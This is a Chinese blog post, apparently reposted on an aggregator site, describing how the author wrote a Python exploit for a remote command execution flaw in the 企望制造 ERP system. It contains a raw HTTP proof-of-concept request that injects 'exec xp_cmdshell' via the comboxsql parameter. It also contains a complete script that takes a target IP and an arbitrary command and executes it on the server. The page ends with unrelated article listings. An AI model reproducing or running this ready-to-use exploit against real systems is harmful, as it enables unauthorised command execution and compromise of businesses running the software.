记一次使用python编写exp

news2025/2/24 14:40:17

使用的漏洞是企望制造ERP系统 RCE漏洞

POC

POST /mainFunctions/comboxstore.action HTTP/1.1
Host: 
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: JSESSIONID=11E0339EEFC982D1B2E80005DD204F4F
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 39

comboxsql=exec%20xp_cmdshell%20'whoami'

python模块

这些是比较常用的

requests
sys
os

这个POC比较简单,直接post发包执行命令就行

python源码

import requests  
  
banner = """\033[34m
 +--^----------,--------,-----,--------^-,
 | |||||||||   `--------'     |          O
 `+---------------------------^----------|
   `\_,---------,---------,--------------'
     / XXXXXX /'|       /'
    / XXXXXX /  `\    /'
   / XXXXXX /`-------'
  / XXXXXX /
 / XXXXXX /
(________(                
 `------' \033[0m             银色子弹Admin
"""

print(banner)
IP = input("\033[91m请输入目标IP:\033[0m")
url = IP + "mainFunctions/comboxstore.action"  
  
# 这里不用编码
RCE = input("\033[91m请输入要执行的命令:\033[0m")
payload = {  
    'comboxsql': "exec xp_cmdshell '%s'" % RCE
}  
  
headers = {  
    'Cache-Control': 'max-age=0',  
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0',  
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',  
    'Accept-Encoding': 'gzip, deflate, br',  
    'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6',  
    'Cookie': 'JSESSIONID=11E0339EEFC982D1B2E80005DD204F4F',  
    'Connection': 'keep-alive',  
    'Content-Type': 'application/x-www-form-urlencoded'  

}  
  
 
response = requests.post(url, data=payload, headers=headers)  
  
 
print("Status Code:", response.status_code)  
print("Response Text:", response.text)  
  
# 如果响应是JSON格式,可以尝试解析并打印  
try:  
    json_response = response.json()  
    print("JSON Response:", json_response)  
except ValueError:  
    # 如果不是JSON格式,则忽略  
    pass

运行效果

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2182419.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

影刀RPA实战:Excel拆分与合并工作表

影刀RPA实战:Excel拆分与合并工作表

1.影刀操作excel的优势 Excel,大家都不陌生,它是微软公司推出的一款电子表格软件,它是 Microsoft Office 套件的一部分。Excel 以其强大的数据处理、分析和可视化功能而闻名,广泛应用于商业、教育、科研等领域。可以说&#xff0…
阅读更多...
生信初学者教程(二十):免疫浸润分析

生信初学者教程(二十):免疫浸润分析

文章目录 介绍加载R包导入数据所需函数堆积图箱线图热图相关性矩阵图输出结果总结介绍 在本章节中,将详细探讨免疫细胞的组成结构、其在不同个体和分组之间的相对丰度差异,并通过热图等可视化手段,对这些差异进行直观而深入的解析。这些分析将有助于科研人员更好地理解免疫细…
阅读更多...
828华为云征文|华为云 Flexus X 实例之家庭娱乐中心搭建

828华为云征文|华为云 Flexus X 实例之家庭娱乐中心搭建

话接上文《828华为云征文|华为云Flexus X实例初体验》,这次我们利用手头的 Flexus X 实例来搭建家庭影音中心和密码管理环境。 前置环境 为了方便小白用户甚至运维人员,我觉得现阶段的宝塔面板 和 1Panel 都是不错的选择。我这里以宝塔为例…
阅读更多...
动态规划最低票价

动态规划最低票价

前言&#xff1a;之前看到过这个题目归结到动态规划&#xff0c;当初还没什么思路&#xff0c;其实就是定义好dp [ i ] 为到第 i 个的最小费用就行&#xff0c;我们可以用upper_bound来优化我们的查找下标 题目地址 class Solution { public:int mincostTickets(vector<int&…
阅读更多...
应对集运仓库丢件问题:集运系统的视频监控验货功能

应对集运仓库丢件问题:集运系统的视频监控验货功能

在集运行业中&#xff0c;包裹丢件问题一直是令企业头疼的问题之一。客户投诉、纠纷处理不仅消耗了大量的人力物力&#xff0c;还可能影响企业的信誉和客户满意度。集运系统提供的视频验货服务&#xff0c;为解决这一难题提供了有效的解决方案。 一、集运仓库丢件问题的现状 集…
阅读更多...
人口普查管理系统基于VUE+SpringBoot+Spring+SpringMVC+MyBatis开发设计与实现

人口普查管理系统基于VUE+SpringBoot+Spring+SpringMVC+MyBatis开发设计与实现

目录 1. 系统概述 2. 系统架构设计 3. 技术实现细节 3.1 前端实现 3.2 后端实现 3.3 数据库设计 4. 安全性设计 5. 效果展示 ​编辑​编辑 6. 测试与部署 7. 示例代码 8. 结论与展望 一个基于 Vue Spring Boot Spring Spring MVC MyBatis 的人口普查管理…
阅读更多...
MyBatis 学习总结

MyBatis 学习总结

1. MyBatis 简介 MyBatis 是一款优秀的持久层框架&#xff0c;简化了 Java 程序与数据库的交互&#xff0c;通过 SQL 映射将 SQL 语句与 Java 对象关联起来。它基于传统 JDBC 的操作进行了封装&#xff0c;使得开发者无需手动编写复杂的 SQL 操作代码。 MyBatis 的特点包括&a…
阅读更多...
《大厂算法冲锋:字符串数字求和的精妙之道》

《大厂算法冲锋:字符串数字求和的精妙之道》

前言 &#x1f680; 博主介绍&#xff1a;大家好&#xff0c;我是无休居士&#xff01;一枚任职于一线Top3互联网大厂的Java开发工程师&#xff01; &#x1f680; &#x1f31f; 欢迎大家关注我的微信公众号【JavaPersons】&#xff01;在这里&#xff0c;你将找到通往Java技…
阅读更多...
云手机可以解决TikTok运营的哪些问题?

云手机可以解决TikTok运营的哪些问题?

随着社交媒体的飞速发展&#xff0c;TikTok迅速崛起&#xff0c;成为个人和企业进行品牌宣传和内容创作的首选平台。然而&#xff0c;在运营TikTok账号的过程中&#xff0c;不少用户会遇到各种问题。本文将详细阐述云手机如何帮助解决这些问题。 1. 多账号管理的高效便捷 通过云…
阅读更多...
[大语言模型-论文精读] 利用多样性进行大型语言模型预训练中重要数据的选择

[大语言模型-论文精读] 利用多样性进行大型语言模型预训练中重要数据的选择

[大语言模型-论文精读] 利用多样性进行大型语言模型预训练中重要数据的选择 论文信息&#xff1a; Harnessing Diversity for Important Data Selection in Pretraining Large Language Models Authors: Chi Zhang, Huaping Zhong, Kuan Zhang, Chengliang Chai, Rui Wang, X…
阅读更多...
栈与队列相关知识(二)

栈与队列相关知识(二)

目录 Java中栈&#xff08;Stack&#xff09; 一. 常用方法 1.push(E item) 2.pop() 3.peek() 4.empty() 二. 常用方法扩展 1. search(Object o) 2. clone() 3. contains(Object o) 4. size() 5. toArray() Java中队列&#xff08;Queue&#xff09; 一.常用方法&…
阅读更多...
如何测试网络质量?

如何测试网络质量?

如何测试网络质量&#xff1f; 通过百度网盘分享的文件&#xff1a;winMTR 链接&#xff1a;https://pan.baidu.com/s/1Zfw4jciNhng35nfwBlF75Q 提取码&#xff1a;6622 –来自百度网盘超级会员V2的分享 下载WINMTR工具&#xff0c;在启动处输入www.baidu.com 判断方法&…
阅读更多...
Trilium Notes笔记本地化部署与简单使用指南打造个人知识库

Trilium Notes笔记本地化部署与简单使用指南打造个人知识库

文章目录 前言1. 安装docker与docker-compose2. 启动容器运行镜像3. 本地访问测试4.安装内网穿透5. 创建公网地址6. 创建固定公网地址 前言 今天和大家分享一款在G站获得了26K的强大的开源在线协作笔记软件&#xff0c;Trilium Notes的中文版如何在Linux环境使用docker本地部署…
阅读更多...
大模型新玩法!腾讯优图与上交大联手 利用公开知识提升大模型

大模型新玩法!腾讯优图与上交大联手 利用公开知识提升大模型

腾讯优图实验室与上海交通大学的研究团队联手推出了一项革命性的知识增强方法&#xff0c;为大模型优化开辟了全新道路。这项创新技术摒弃了传统模型微调的局限&#xff0c;直接从开源数据中提取知识&#xff0c;大幅简化了模型优化流程&#xff0c;在多项任务中实现了超越现有…
阅读更多...
【高性能内存池】central cache内存回收 7

【高性能内存池】central cache内存回收 7

thread cache中自由链表过长后&#xff0c;会将多出来的内存还给entral cache.thread cache还回来的内存可能不属于同一个span,因此&#xff0c;除了计算出要还到central cache的哪个桶之外&#xff0c;还需要计算出还到桶的哪个span。 1. 如何根据对象的地址找到对象的页号&am…
阅读更多...
2024年9月中国干旱监测报告(FYDI-2.0指数)

2024年9月中国干旱监测报告(FYDI-2.0指数)

目录 引言 旱情监测与分析 资料来源 引言 2024年9月&#xff0c;北方的降水逐渐增多&#xff0c;进入华西秋雨集中期&#xff0c;从青藏高原北部一直延伸到东北多地&#xff0c;常出现大范围的云带&#xff0c;西北地区的降雨强度较大。南方地区降水分布不均&#xff0c;受…
阅读更多...
卷积神经网络(CNN)的计算量和参数怎么准确估计?

卷积神经网络(CNN)的计算量和参数怎么准确估计?

&#x1f349; CSDN 叶庭云&#xff1a;https://yetingyun.blog.csdn.net/ 1. 卷积层&#xff08;Convolutional Layer&#xff09; a) 计算量估计&#xff1a; 卷积层的 FLOPs 2 * H_out * W_out * C_in * C_out * K_h * K_w 详细解释&#xff1a; H_out, W_out&#xff…
阅读更多...
linux:详解nohup命令

linux:详解nohup命令

在 UNIX 和类 UNIX 操作系统&#xff08;如 Linux 和 macOS&#xff09;中&#xff0c;nohup 意图为后台运行且免疫挂断信号的命令&#xff0c;用于在用户注销&#xff08;logout&#xff09;或终端关闭后继续运行相应的进程。 基本语法 启动进程 nohup [COMMAND] [ARG...] …
阅读更多...
SW - 装配图旋转到一个想要的正视图

SW - 装配图旋转到一个想要的正视图

文章目录 SW - 装配图旋转到一个想要的正视图概述笔记将装配图旋转到自己想要的视图的方法保存当前视图选择自己保存的视图END SW - 装配图旋转到一个想要的正视图 概述 在弄装配图。 如果按照SW默认的视图&#xff0c;Y方向是反的。 原因在于我画零件图时&#xff0c;方向就…
阅读更多...
SpringBoot整合JPA详解

SpringBoot整合JPA详解

SpringBoot版本是2.0以上(2.6.13) JDK是1.8 一、依赖 <dependencies><!-- jdbc --><dependency><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-data-jdbc</artifactId></dependency><!--…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023